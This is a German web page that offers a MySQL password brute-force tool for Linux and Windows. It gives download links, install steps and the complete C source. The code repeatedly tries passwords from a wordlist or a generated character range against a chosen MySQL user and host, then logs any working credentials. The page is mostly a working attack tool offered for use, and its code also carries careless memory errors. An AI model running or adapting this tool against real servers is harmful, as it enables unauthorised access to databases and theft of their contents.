MySQL Bruteforce for Linux and Windows

Linux Source and Binarys

mysql-bruteforce.c (Sourcecode)
mysql-bruteforce.tar
(sourcecode tarball)
mysql-bruteforce-binary-only.tar (compiled Binary)
You need to install ncurses

apt-get install libncurses5-dev libncurses5

Windows Source and Binarys

mysql-bruteforce-win32.tar (sourcecode tarball)
pdcurses.dll (PDCurses.dll)
libmySQL.dll (libmySQL.dll)
mysql-bruteforce-win32.c SourceCode for Windows

Here is the Source (Linux)

#include <stdio.h>
#include <mysql/mysql.h>
#include <curses.h>
#include <string.h>
#include <stdlib.h>

// Deutsch oder English
#define GER 1
#define ENG 0
/*
**************************************************************************************************
*  MYSQL Bruteforce Programm aus purer lange Weile geschrieben 
*   23.03 2010 by cd 
*
*   gcc mysql-bruteforce.c -o mysql-bruteforce -lmysqlclient -lncurses -O2 -Wall
*   oder -O6 anstatt -O2
*  ./mysql-bruteforce benutzer computer kennwortliste <optional länge des kennworts>
*  log Datei ist "mysql-bruteforce.log"
*
**************************************************************************************************
**************************************************************************************************
*
*  for the people that understand no german change the #define ENG to 1 and GER to 0
*
*  compile with: gcc mysql-bruteforce.c -o mysql-bruteforce -lmysqlclient -lncurses -O3 -Wall
*  or -O6 instead of -O2
*  usage: ./mysql-bruteforce user host <password list> <optional len of password>
*  log file is "mysql-bruteforce.log"
*
**************************************************************************************************
*
*   Newest version http://bruteforce.at/mysql
*
*   Think about the old good time MoD
*   If you want to survive out here, you've got to know where your towel is.
*/

MYSQL *my;

int count=0;
char *passwd;

#define STARTCHR 46 // 33 set start ascii char
#define ENDCHR 122  // 127 set end ascii cahr
#define BUFF_SIZE 1024
#define LEN 80

char buffer[BUFF_SIZE];
int jump=0;

int main (int argc, char *argv[])
{
if (argc <= 3 )
    {
#if ENG && !GER
    printf("\n"
    "\n   MySQL Bruteforce, written by cd\n\n"
    "    via wordlist\n"
    "    %s root localhost wordlist       # use complete wordlist\n"
    "    %s root 127.0.0.1 ../wordlist 7  # serch only words with 7 chars\n"
    "\n"
    "    standard bruteforce\n"
    "    %s root localhost -b      # Bruteforce Method (standard up to 8 chars)\n"
    "    %s root 127.0.0.1 -b 12   # up to 12 chars\n"
    "    %s root host -b 12 Test   # start with the given Word\n\n\n\n\n",argv[0],argv[0],argv[0],argv[0],argv[0]);
#else
    printf("\n"
    "\n   MySQL Bruteforce, geschrieben von cd\n\n"
    "    via Wörterliste\n"
    "    %s root localhost wordlist       # Gesamte Wörterliste durchsuchen\n"
    "    %s root 127.0.0.1 ../wordlist 7  # suche nur Wörter mit 7 Buchstaben\n"
    "\n"
    "    Standard Bruteforce\n"
    "    %s root localhost -b      # Bruteforce Methode (standard bis zu 8 Buchstaben)\n"
    "    %s root 127.0.0.1 -b 12   # bis zu 12 Buchstaben\n"
    "    %s root host -b 12 Test   # Startet mit angegebenen Wort\n\n\n\n\n",argv[0],argv[0],argv[0],argv[0],argv[0]);
#endif
    return 0;
    }

if(strcmp(argv[3],"-b")) 
    {
	jump=0;
    } else jump=1;

    initscr();
    printw("\n#################################\n#\tMYSQL Bruteforce\t#\n#\t2010 by cd\t\t#\n#################################\n\n\t\n");
    refresh();

    char host[20];
    char user[20];
    my = mysql_init(NULL);
    FILE *pass_list,*logfile;

if( ( pass_list=fopen(argv[3],"r") ) == NULL && jump!=1 ) 
{
#if ENG && !GER
fprintf(stderr,"Cannot open File \"%s\"\n", argv[3]);
#else
fprintf(stderr,"Kann Datei \"%s\" nicht oeffnen.\n", argv[3]);
#endif
endwin();
return 0;
}

if( ( logfile=fopen("mysql-bruteforce.log","a+") ) == NULL )
{
#if ENG && !GER
fprintf(stderr,"Cannot open File \"%s\"\n", argv[3]);
#else
fprintf(stderr,"Kann Datei \"%s\" nicht oeffnen.\n", argv[3]);
#endif
endwin();
return 0;
}

    if(my == NULL)
	{
#if ENG && !GER
	    fprintf(stderr, "Initialization failed\n");
#else
	    fprintf(stderr, "Initialisierung fehlgeschlagen\n");
#endif
	    endwin();
	    return 0;
	}

sprintf(user, "%s", argv[1]);
sprintf(host, "%s", argv[2]);

char eingabe;

#if ENG && !GER
mvprintw(5,2,"User: %s Host: %s ",user,host);
#else
mvprintw(5,2,"Benutzer: %s Server: %s ",user,host);
#endif

if (jump==1)
{
refresh();
eingabe='b';

}
else {eingabe='w';}

switch(eingabe)
{
case 'b':
while(1)
{
    int min=1,max;
    if (argc<=4)
	{
	    max=8;
	}
	    else 
	    {
		max=atoi(argv[4]); 
	    }

    char *pass=(char*)malloc(min);
    int pos,x,found; 

	    pass[min]='\0';

    if (argc>=6)
	{ 
	    min=strlen(argv[5]);
	    pass=argv[5];
	    pass[min+1]='\0';
	    pos=min;
	    if (atoi(argv[4])!=strlen(argv[5]))
		{
#if ENG && !GER
		 mvprintw(7,0,"len of word must be the same the digit after -b\n"
		 "like: %s root localhost -b 4 abcd\n",argv[0]);
#else
		 mvprintw(7,0,"länge des Wortes muss die gleiche seien wie die zahl nach -b\n"
		 "z.B: %s root localhost -b 4 abcd\n",argv[0]);
#endif
		 refresh();
		 endwin();
		 return 0;
		 }

	}

    for(x=min;x<=max;x++)
	{
	    if(x>min)
		{
		    if (realloc(pass, x)) 
			{
			    memset(pass, STARTCHR, x);
			    pass[x]='\0';
			} else {
				    mvprintw(13,1,"error in realloc");
				    endwin(); 
				    return 1;
				}
		}
	    while(pass[0]<ENDCHR)
		{
		    found=0;
		    if( mysql_real_connect (my,host,user,pass,NULL,0,NULL,0)  == NULL)
			{
			    move(6,2);
			    deleteln();
			    mvprintw(6,2,"Pass: %s",pass);
			    refresh();
			}
			else
			    {
				move(6,2);
				deleteln();
				mvprintw(6,2,"Pass: %s",pass);
				refresh();
#if ENG && !GER
				mvprintw(8,2,"Login Success:\t %s:%s@%s\n",user,pass,host);
#else
				mvprintw(8,2,"Login Erfolgreich:\t %s:%s@%s\n",user,pass,host);
#endif
				refresh();
				endwin();
				mysql_close(my);
				fprintf(logfile,"%s:%s@%s\r\n",user,pass,host);
				return 0;
			    }

		    for(pos=x-1;pos!=0;pos--)
			{
			    if(pass[pos]==ENDCHR)
				{
				    memset(pass+pos, STARTCHR, strlen(pass)-pos);
				    pass[pos-1]++;
				    found=1;
				    break;
				}
			}

		    if(!found)
			pass[x-1]++;
			count++;
		}
	}

    move(6,2);
    deleteln();
#if ENG && !GER
    mvprintw(8,2,"Password not found for %s@%s :/",user,host);
#else
    mvprintw(8,2,"Passwort fuer %s@%s nicht gefunden :/",user,host);
#endif
    refresh();
    endwin();
    mysql_close (my);
    return 0;
}
break;
}

int dummy;
while((fscanf(pass_list, "%s\r\n", buffer))!=EOF)
{
    if (argv[4])
	{
	    if (strlen(buffer)!=atoi(argv[4])) goto next; // blubb goto i know ^^ phuu
	}

    if( mysql_real_connect (my,host,user,buffer,NULL,0,NULL,0)  == NULL)
	{
	    move(6,2);
	    deleteln();
	    mvprintw(6,2,"Pass: %s",buffer);
	    refresh();
	}
	else
	    {
		move(6,2);
		deleteln();
		mvprintw(6,2,"Pass: %s",buffer);
		refresh();
#if ENG && !GER
		mvprintw(8,2,"Login Success:\t %s:%s@%s\n",user,buffer,host);
#else
		mvprintw(8,2,"Login Erfolgreich:\t %s:%s@%s\n",user,buffer,host);
#endif
		refresh();
		endwin();
		mysql_close(my);
		fprintf(logfile,"%s:%s@%s\r\n",user,buffer,host);
		return 0;
	    }
next:
dummy=1;
}

    move(6,2);
    deleteln();
#if ENG && !GER
    mvprintw(8,2,"Password not found for %s@%s :/",user,host);
#else
    mvprintw(8,2,"Passwort fuer %s@%s nicht gefunden :/",user,host);
#endif
    refresh();
    endwin();
    mysql_close (my);
    return 0;
}

 

 

Schreibe einen Kommentar

Deine E-Mail-Adresse wird nicht veröffentlicht. Erforderliche Felder sind mit * markiert